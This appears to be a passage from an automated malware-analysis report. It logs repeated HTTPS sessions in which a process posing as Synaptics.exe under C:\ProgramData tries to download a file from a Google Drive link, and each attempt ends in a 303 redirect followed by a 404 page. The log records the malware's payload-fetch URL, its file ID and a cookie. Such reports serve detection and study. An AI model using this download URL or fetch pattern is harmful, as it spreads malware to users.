                                                                                                                                        20192.168.2.549744142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:27 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        2024-12-30 10:46:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:27 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-nt0rBTc-RMKhhEpgiFQbQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        21192.168.2.549746142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:27 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        2024-12-30 10:46:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:27 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-MBXR2iG_HwrPu6YsjZFs6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        22192.168.2.549745142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:27 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:28 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC4lRxXvKqntFmAv49Kt_DmVIJBv-cyzvu61-qlSY2NoyyDWxGmrAl7dD6TqXaJJF4jAq4R8KE8
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:27 GMT
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-5Tf15NjmFzJ_KpNbum2L9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:28 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                        2024-12-30 10:46:28 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 35 46 2d 62 57 38 6e 59 73 39 4f 33 4c 4e 65 4e 39 69 58 55 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="X5F-bW8nYs9O3LNeN9iXUA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                        2024-12-30 10:46:28 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        23192.168.2.549748142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:28 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        2024-12-30 10:46:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:28 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-738MzlKf9szwGz3F7maLsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        24192.168.2.549749142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:28 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:28 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC4V4EcuqXGEyBy--vxWpRD16bls4hrnar4F-wnXNfyOl-LglW7VWHeyq1uTZibe7pqeNLajpWU
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:28 GMT
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-thT4M306q7AMBhXZYfMdpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:28 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                        2024-12-30 10:46:28 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 44 45 77 58 32 34 47 52 6e 46 63 41 35 52 68 7a 35 7a 4d 58 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="3DEwX24GRnFcA5Rhz5zMXA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                        2024-12-30 10:46:28 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        25192.168.2.549750142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:28 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        2024-12-30 10:46:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:28 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-L7Iwnk2xtmxswJESoLB5fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        26192.168.2.549751142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:28 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:29 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC4pHj7yTg57lqWyJoWRdz0WXUcltGR-Kn-KyNJuyDZlG8Us2omXWAnt7DPTftgRPnDj
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:28 GMT
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-QNLp2Me4-0lJgGtoff4mhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:29 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                        2024-12-30 10:46:29 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 35 6e 4e 70 4d 62 41 62 49 67 34 51 4b 66 52 78 44 74 6f 4d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="M5nNpMbAbIg4QKfRxDtoMg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                        2024-12-30 10:46:29 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        27192.168.2.549754142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:29 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        2024-12-30 10:46:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:29 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-eEao1iz8-KN_VDrqRQ7k9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        28192.168.2.549755142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
